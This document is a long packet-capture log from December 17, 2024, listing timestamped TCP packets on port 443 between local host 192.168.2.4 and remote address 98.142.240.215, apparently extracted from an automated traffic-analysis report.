                                                                                                                                                                              Dec 17, 2024 18:12:42.417896986 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.417962074 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.417973042 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.418025017 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.420290947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.420380116 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.420391083 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.420439005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.422528028 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.422610044 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.422629118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.422671080 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.425060987 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.425158024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.425168991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.425220966 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.427598953 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.427670002 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.427680969 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.427791119 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.429505110 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.429589033 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.429599047 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.429845095 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.431796074 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.431869030 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.431879997 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.432097912 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.434298038 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.434367895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.434381008 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.434494972 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.436748981 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.436820030 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.436830997 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.436870098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.439209938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.439326048 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.439337015 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.439709902 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.618236065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.618453979 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.618484020 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.619080067 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.620232105 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.620333910 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.620347977 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.620532990 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.622315884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.622404099 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.622412920 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.622643948 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.624460936 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.624538898 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.624550104 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.624733925 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.627510071 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.627579927 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.627593994 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.627662897 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.629133940 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.629204988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.629214048 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.629311085 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.631844044 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.631915092 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.631926060 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.632110119 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.634877920 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.634952068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.634962082 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.635015965 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.636394978 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.636457920 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.636470079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.636539936 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.638605118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.638685942 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.638712883 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.638813019 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.641576052 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.641653061 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.641679049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.641758919 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.644443035 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.644514084 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.644526958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.644572020 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.645884991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.645951033 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.645960093 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.646004915 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.648786068 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.648855925 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.648868084 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.648984909 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.651154041 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.651237011 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.651247025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.651294947 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.652456045 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.652530909 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.652539968 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.652637959 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.810651064 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.810765028 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.810796022 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.812830925 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.812922001 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.812930107 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.813047886 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.815186024 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.815268040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.815274954 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.815355062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.817430973 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.817522049 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.817529917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.817814112 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.820497990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.820593119 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.820600033 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.820786953 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.822093964 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.822156906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.822164059 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.822343111 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.824371099 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.824440002 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.824446917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.825041056 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.827467918 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.827537060 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.827544928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.828057051 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.829062939 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.829139948 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.829157114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.829216957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.831331015 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.831407070 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.831415892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.831684113 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.834443092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.834503889 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.834511995 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.834551096 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.836760998 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.836831093 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.836838961 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.837044001 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.839127064 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.839200020 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.839206934 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.841064930 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.841455936 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.841523886 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.841531992 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.843822002 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.843885899 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.843894958 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.845068932 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.846106052 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.846178055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:42.846185923 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:42.846306086 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.003053904 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.003196001 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.003223896 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.005052090 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.005393982 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.005460978 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.005466938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.007894993 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.007966995 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.007973909 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.008014917 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.010214090 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.010313988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.010319948 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.010353088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.012571096 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.012641907 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.012648106 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.013046980 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.014755964 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.014827967 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.014832973 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.015146971 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.017033100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.017096043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.017102003 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.017260075 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.019540071 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.019610882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.019617081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.019769907 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.022268057 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.022331953 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.022336960 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.022495031 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.024116039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.024180889 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.024185896 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.024339914 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.026343107 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.026408911 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.026413918 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.026566029 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.028656006 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.028718948 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.028723955 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.028913975 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.031033039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.031100988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.031105995 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.033039093 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.033265114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.033330917 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.033335924 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.035624027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.035684109 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.035689116 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.035726070 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.037954092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.038021088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.038026094 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.041060925 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.194791079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.194901943 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.194931030 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.197057009 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.197866917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.197938919 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.197945118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.199995995 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.200068951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.200074911 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.201040983 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.202385902 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.202461004 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.202466011 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.204631090 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.204688072 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.204694986 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.204737902 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.207081079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.207179070 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.207185030 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.207226992 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.209686995 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.209769964 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.209777117 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.211793900 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.211865902 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.211873055 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.213041067 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.213931084 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.214004040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.214009047 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.216331005 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.216398001 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.216404915 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.216448069 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.218688011 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.218763113 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.218769073 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.220947027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.221050024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.221076965 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.223264933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.223351002 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.223362923 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.223407984 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.225586891 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.225661993 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.225668907 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.228009939 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.228081942 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.228090048 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.229062080 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.230281115 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.230361938 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.230379105 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.233062029 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.387238979 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.387336969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.387362957 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.387412071 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.389448881 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.389559984 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.389568090 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.389614105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.391840935 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.391911983 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.391917944 CET4434973198.142.240.215192.168.2.4
